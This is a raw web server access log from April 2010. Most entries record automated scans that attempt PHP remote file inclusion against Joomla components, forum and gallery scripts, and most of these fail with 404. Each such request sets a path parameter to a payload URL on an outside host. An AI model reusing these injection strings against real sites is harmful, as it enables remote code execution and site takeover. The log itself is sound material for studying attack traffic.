195.9.14.148 - - [28/Apr/2010:11:44:29 -0500] "GET /logs//zina02_green/write.php?dir=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 312 "-""Mozilla/5.0"
195.9.14.148 - - [28/Apr/2010:11:44:57 -0500] "GET //zina02_green/write.php?dir=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 307 "-""Mozilla/5.0"
195.9.14.148 - - [28/Apr/2010:11:44:57 -0500] "GET /logs/access_log.1220054400//zina02_green/write.php?dir=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 334 "-""Mozilla/5.0"
195.9.14.148 - - [28/Apr/2010:11:44:57 -0500] "GET /logs//zina02_green/write.php?dir=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 312 "-""Mozilla/5.0"
77.92.94.85 - - [28/Apr/2010:11:50:35 -0500] "GET /logs//setup.php?dir=http://77.92.94.85/echos.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.813"
77.92.94.85 - - [28/Apr/2010:11:50:35 -0500] "GET //setup.php?dir=http://77.92.94.85/echos.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.813"
67.195.112.180 - - [28/Apr/2010:11:54:00 -0500] "GET /logs/access_log.1199059200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.126.254.139 - - [28/Apr/2010:12:01:11 -0500] "GET //skin/rini_cleangallery/script_popup.php?dir=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 324 "-""Mozilla/5.0"
209.126.254.139 - - [28/Apr/2010:12:01:11 -0500] "GET /logs/access_log.1263772800//skin/rini_cleangallery/script_popup.php?dir=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 351 "-""Mozilla/5.0"
209.126.254.139 - - [28/Apr/2010:12:01:11 -0500] "GET /logs//skin/rini_cleangallery/script_popup.php?dir=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 329 "-""Mozilla/5.0"
209.126.254.139 - - [28/Apr/2010:12:01:12 -0500] "GET //skin/rini_cleangallery/script_popup.php?dir=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 324 "-""Mozilla/5.0"
209.126.254.139 - - [28/Apr/2010:12:01:12 -0500] "GET /logs//skin/rini_cleangallery/script_popup.php?dir=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 329 "-""Mozilla/5.0"
209.126.254.139 - - [28/Apr/2010:12:01:12 -0500] "GET /logs/access_log.1263772800//skin/rini_cleangallery/script_popup.php?dir=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 351 "-""Mozilla/5.0"
67.195.112.180 - - [28/Apr/2010:12:02:20 -0500] "GET /logs/access_log.1223596800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.100 - - [28/Apr/2010:12:03:55 -0500] "GET /logs/access_log.1165104000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.9.14.148 - - [28/Apr/2010:12:07:13 -0500] "GET //skin/rini_cleangallery/script_popup.php?dir=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 324 "-""Mozilla/5.0"
195.9.14.148 - - [28/Apr/2010:12:07:13 -0500] "GET /logs//skin/rini_cleangallery/script_popup.php?dir=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 329 "-""Mozilla/5.0"
195.9.14.148 - - [28/Apr/2010:12:07:13 -0500] "GET /logs/access_log.1263772800//skin/rini_cleangallery/script_popup.php?dir=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 351 "-""Mozilla/5.0"
121.190.102.21 - - [28/Apr/2010:12:07:57 -0500] "GET /administrator//glas-blog.de//modules/xt_conteudo/admin=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
121.190.102.21 - - [28/Apr/2010:12:07:57 -0500] "GET /logs/access_log.1265241600/administrator//glas-blog.de//modules/xt_conteudo/admin=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 404 "-""Mozilla/5.0"
121.190.102.21 - - [28/Apr/2010:12:07:57 -0500] "GET /logs/administrator//glas-blog.de//modules/xt_conteudo/admin=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 382 "-""Mozilla/5.0"
121.190.102.21 - - [28/Apr/2010:12:08:34 -0500] "GET /logs/administrator//glas-blog.de//modules/xt_conteudo/admin=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 382 "-""Mozilla/5.0"
121.190.102.21 - - [28/Apr/2010:12:08:34 -0500] "GET /logs/access_log.1265241600/administrator//glas-blog.de//modules/xt_conteudo/admin=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 404 "-""Mozilla/5.0"
121.190.102.21 - - [28/Apr/2010:12:08:34 -0500] "GET /administrator//glas-blog.de//modules/xt_conteudo/admin=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
207.46.195.233 - - [28/Apr/2010:12:11:25 -0500] "GET /logs/access_log.1244332800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
114.108.151.149 - - [28/Apr/2010:12:12:55 -0500] "GET /logs//forum/adminLogin.php?config[forum_installed]=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 310 "-""Mozilla/5.0"
114.108.151.149 - - [28/Apr/2010:12:12:55 -0500] "GET //forum/adminLogin.php?config[forum_installed]=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 305 "-""Mozilla/5.0"
114.108.151.149 - - [28/Apr/2010:12:12:55 -0500] "GET /logs/access_log.1222473600//forum/adminLogin.php?config[forum_installed]=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 332 "-""Mozilla/5.0"
114.108.151.149 - - [28/Apr/2010:12:12:55 -0500] "GET /logs//forum/adminLogin.php?config[forum_installed]=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 310 "-""Mozilla/5.0"
114.108.151.149 - - [28/Apr/2010:12:12:55 -0500] "GET /logs/access_log.1222473600//forum/adminLogin.php?config[forum_installed]=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 332 "-""Mozilla/5.0"
114.108.151.149 - - [28/Apr/2010:12:12:56 -0500] "GET //forum/adminLogin.php?config[forum_installed]=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 305 "-""Mozilla/5.0"
114.108.151.149 - - [28/Apr/2010:12:16:57 -0500] "GET /logs/access_log.1222473600%20%20//forum/adminLogin.php?config[forum_installed]=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 334 "-""Mozilla/5.0"
114.108.151.149 - - [28/Apr/2010:12:16:57 -0500] "GET //forum/adminLogin.php?config[forum_installed]=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 305 "-""Mozilla/5.0"
114.108.151.149 - - [28/Apr/2010:12:16:57 -0500] "GET /logs//forum/adminLogin.php?config[forum_installed]=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 310 "-""Mozilla/5.0"
114.108.151.149 - - [28/Apr/2010:12:17:22 -0500] "GET /logs//forum/adminLogin.php?config[forum_installed]=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 310 "-""Mozilla/5.0"
114.108.151.149 - - [28/Apr/2010:12:17:22 -0500] "GET //forum/adminLogin.php?config[forum_installed]=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 305 "-""Mozilla/5.0"
114.108.151.149 - - [28/Apr/2010:12:17:22 -0500] "GET /logs/access_log.1222473600%20%20//forum/adminLogin.php?config[forum_installed]=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 334 "-""Mozilla/5.0"
72.249.126.147 - - [28/Apr/2010:12:27:13 -0500] "GET /'/components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
72.249.126.147 - - [28/Apr/2010:12:27:13 -0500] "GET /logs/access_log.1219708800/'/components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
72.249.126.147 - - [28/Apr/2010:12:27:13 -0500] "GET /logs/'/components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
72.249.126.147 - - [28/Apr/2010:12:27:46 -0500] "GET /logs/access_log.1212969600/'/components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
72.249.126.147 - - [28/Apr/2010:12:29:36 -0500] "GET /logs/access_log.1215648000/'/components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
207.46.195.225 - - [28/Apr/2010:12:30:25 -0500] "GET /logs/access_log.1232841600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.95 - - [28/Apr/2010:12:30:55 -0500] "GET /costume/index1.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [28/Apr/2010:12:31:45 -0500] "GET /logs/access_log.1229731200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.90 - - [28/Apr/2010:12:32:26 -0500] "GET /logs/access_log.1164844800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.237 - - [28/Apr/2010:12:35:25 -0500] "GET /logs/access_log.1189296000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [28/Apr/2010:12:35:50 -0500] "GET /artwork/artmaster.htm HTTP/1.0" 200 886 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.204.196 - - [28/Apr/2010:12:36:24 -0500] "GET /logs/access_log.1225324800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.227 - - [28/Apr/2010:12:37:25 -0500] "GET /logs/access_log.1174953600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.48 - - [28/Apr/2010:12:44:26 -0500] "GET /logs/access_log.1163289600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.140.247.10 - - [28/Apr/2010:12:49:54 -0500] "GET //com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.140.247.10 - - [28/Apr/2010:12:49:54 -0500] "GET /logs/access_log.1263772800//com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
62.140.247.10 - - [28/Apr/2010:12:49:54 -0500] "GET /logs//com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
80.67.20.117 - - [28/Apr/2010:12:50:16 -0500] "GET /?sourcedir=http://www.joesjava.org/access/files/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
80.67.20.117 - - [28/Apr/2010:12:50:16 -0500] "GET /logs/access_log.1262390400/?sourcedir=http://www.joesjava.org/access/files/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
80.67.20.117 - - [28/Apr/2010:12:50:16 -0500] "GET /logs/?sourcedir=http://www.joesjava.org/access/files/id1.txt?? HTTP/1.1" 200 3472 "-""Mozilla/5.0"
80.67.20.117 - - [28/Apr/2010:12:50:24 -0500] "GET /logs/access_log.1247270400/?sourcedir=http://www.joesjava.org/access/files/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
209.126.254.139 - - [28/Apr/2010:12:50:36 -0500] "GET /?DOCUMENT_ROOT=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
209.126.254.139 - - [28/Apr/2010:12:50:36 -0500] "GET /logs/?DOCUMENT_ROOT=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 200 3472 "-""Mozilla/5.0"
209.126.254.139 - - [28/Apr/2010:12:50:36 -0500] "GET /logs/access_log.1217548800%20%20/?DOCUMENT_ROOT=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 313 "-""Mozilla/5.0"
210.190.64.68 - - [28/Apr/2010:12:50:45 -0500] "GET /logs/access_log.1263772800//com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
210.190.64.68 - - [28/Apr/2010:12:50:45 -0500] "GET /logs/access_log.1264723200//com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
210.190.64.68 - - [28/Apr/2010:12:50:45 -0500] "GET //com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
210.190.64.68 - - [28/Apr/2010:12:50:45 -0500] "GET /logs//com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
218.38.28.134 - - [28/Apr/2010:12:50:52 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
218.38.28.134 - - [28/Apr/2010:12:50:52 -0500] "GET /logs/access_log.1219708800/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
218.38.28.134 - - [28/Apr/2010:12:50:52 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
218.38.28.134 - - [28/Apr/2010:12:50:52 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
218.38.28.134 - - [28/Apr/2010:12:50:52 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
218.38.28.134 - - [28/Apr/2010:12:50:52 -0500] "GET /logs/access_log.1219708800/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
189.108.172.26 - - [28/Apr/2010:12:51:12 -0500] "GET /include/mail.inc.php?skin_board_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
189.108.172.26 - - [28/Apr/2010:12:51:12 -0500] "GET /logs/access_log.1225238400/include/mail.inc.php?skin_board_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
189.108.172.26 - - [28/Apr/2010:12:51:12 -0500] "GET /logs/include/mail.inc.php?skin_board_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
209.126.254.139 - - [28/Apr/2010:12:51:19 -0500] "GET /?DOCUMENT_ROOT=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
209.126.254.139 - - [28/Apr/2010:12:51:19 -0500] "GET /logs/?DOCUMENT_ROOT=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 200 3472 "-""Mozilla/5.0"
209.126.254.139 - - [28/Apr/2010:12:51:19 -0500] "GET /logs/access_log.1217548800%20%20/?DOCUMENT_ROOT=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 313 "-""Mozilla/5.0"
218.38.28.134 - - [28/Apr/2010:12:51:28 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
218.38.28.134 - - [28/Apr/2010:12:51:28 -0500] "GET /logs/access_log.1219708800%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 353 "-""Mozilla/5.0"
218.38.28.134 - - [28/Apr/2010:12:51:28 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
218.38.28.134 - - [28/Apr/2010:12:51:32 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
218.38.28.134 - - [28/Apr/2010:12:51:32 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
218.38.28.134 - - [28/Apr/2010:12:51:32 -0500] "GET /logs/access_log.1219708800%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 353 "-""Mozilla/5.0"
189.108.172.26 - - [28/Apr/2010:12:51:33 -0500] "GET /logs/access_log.1265760000/include/mail.inc.php?skin_board_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
218.38.28.134 - - [28/Apr/2010:12:52:22 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
218.38.28.134 - - [28/Apr/2010:12:52:22 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
218.38.28.134 - - [28/Apr/2010:12:52:22 -0500] "GET /logs/access_log.1225238400/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
218.38.28.134 - - [28/Apr/2010:12:52:26 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
218.38.28.134 - - [28/Apr/2010:12:52:27 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
218.38.28.134 - - [28/Apr/2010:12:52:27 -0500] "GET /logs/access_log.1225238400/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
195.9.14.148 - - [28/Apr/2010:12:53:34 -0500] "GET /?DOCUMENT_ROOT=http://dtrplasticos.com.br/components/com_wrapper/grey-40.gif?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
195.9.14.148 - - [28/Apr/2010:12:53:34 -0500] "GET /logs/?DOCUMENT_ROOT=http://dtrplasticos.com.br/components/com_wrapper/grey-40.gif?? HTTP/1.1" 200 3472 "-""Mozilla/5.0"
195.9.14.148 - - [28/Apr/2010:12:53:34 -0500] "GET /logs/access_log.1217548800%20%20/?DOCUMENT_ROOT=http://dtrplasticos.com.br/components/com_wrapper/grey-40.gif?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
195.9.14.148 - - [28/Apr/2010:12:53:34 -0500] "GET /?DOCUMENT_ROOT=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
195.9.14.148 - - [28/Apr/2010:12:53:34 -0500] "GET /logs/access_log.1217548800%20%20/?DOCUMENT_ROOT=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 404 313 "-""Mozilla/5.0"
195.9.14.148 - - [28/Apr/2010:12:53:34 -0500] "GET /logs/?DOCUMENT_ROOT=http://allahverdiyev.com/wp-includes/.lets/ver1? HTTP/1.1" 200 3472 "-""Mozilla/5.0"
190.152.145.54 - - [28/Apr/2010:12:54:02 -0500] "GET /logs/access_log.1271030400//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://firststreetgalleries.com/cok1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
190.152.145.54 - - [28/Apr/2010:12:54:02 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://firststreetgalleries.com/cok1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
190.152.145.54 - - [28/Apr/2010:12:54:02 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://firststreetgalleries.com/cok1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
190.152.145.54 - - [28/Apr/2010:12:54:55 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://firststreetgalleries.com/cok1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
190.152.145.54 - - [28/Apr/2010:12:54:55 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://firststreetgalleries.com/cok1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
190.152.145.54 - - [28/Apr/2010:12:54:55 -0500] "GET /logs/access_log.1271030400//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://firststreetgalleries.com/cok1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
207.46.199.55 - - [28/Apr/2010:12:55:25 -0500] "GET /logs/access_log.1238025600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.140.247.10 - - [28/Apr/2010:12:57:22 -0500] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
62.140.247.10 - - [28/Apr/2010:12:57:22 -0500] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
62.140.247.10 - - [28/Apr/2010:12:57:22 -0500] "GET /logs/access_log.1268956800%20%20/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 389 "-""Mozilla/5.0"
210.190.64.68 - - [28/Apr/2010:12:59:02 -0500] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
210.190.64.68 - - [28/Apr/2010:12:59:02 -0500] "GET /logs/access_log.1268956800%20%20/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 389 "-""Mozilla/5.0"
210.190.64.68 - - [28/Apr/2010:12:59:02 -0500] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
62.140.247.10 - - [28/Apr/2010:13:00:32 -0500] "GET /logs/access_log.1264723200/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 387 "-""Mozilla/5.0"
62.140.247.10 - - [28/Apr/2010:13:00:32 -0500] "GET /logs/access_log.1265760000/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 387 "-""Mozilla/5.0"
62.140.247.10 - - [28/Apr/2010:13:00:55 -0500] "GET /logs/access_log.1268956800/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 387 "-""Mozilla/5.0"
207.46.204.187 - - [28/Apr/2010:13:00:55 -0500] "GET /logs/access_log.1263859200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.38.28.134 - - [28/Apr/2010:13:01:47 -0500] "GET /logs/access_log.1219708800/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
218.38.28.134 - - [28/Apr/2010:13:01:47 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
218.38.28.134 - - [28/Apr/2010:13:01:47 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
218.38.28.134 - - [28/Apr/2010:13:01:48 -0500] "GET /logs/access_log.1219708800/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
218.38.28.134 - - [28/Apr/2010:13:01:48 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
218.38.28.134 - - [28/Apr/2010:13:01:48 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
67.195.112.180 - - [28/Apr/2010:13:02:17 -0500] "GET /logs/access_log.1224460800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.13.242.67 - - [28/Apr/2010:13:06:05 -0500] "POST /logs//help.php HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; NetCaptor 7.0.2 Final; .NET CLR 1.0.3705)"
123.30.181.5 - - [28/Apr/2010:13:07:29 -0500] "GET ////?_PHPLIB[libdir]=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:13:07:29 -0500] "GET /logs/access_log.1265760000////?_PHPLIB[libdir]=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:13:07:29 -0500] "GET /logs/access_log.1225238400////?_PHPLIB[libdir]=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:13:07:29 -0500] "GET /logs////?_PHPLIB[libdir]=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 200 3479 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:13:07:31 -0500] "GET /logs/access_log.1225238400////?_PHPLIB[libdir]=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:13:07:31 -0500] "GET ////?_PHPLIB[libdir]=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:13:07:31 -0500] "GET /logs////?_PHPLIB[libdir]=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 200 3479 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:13:07:36 -0500] "GET /logs/access_log.1265760000////?_PHPLIB[libdir]=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:13:07:46 -0500] "GET /logs/access_log.1225238400////?_PHPLIB[libdir]=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
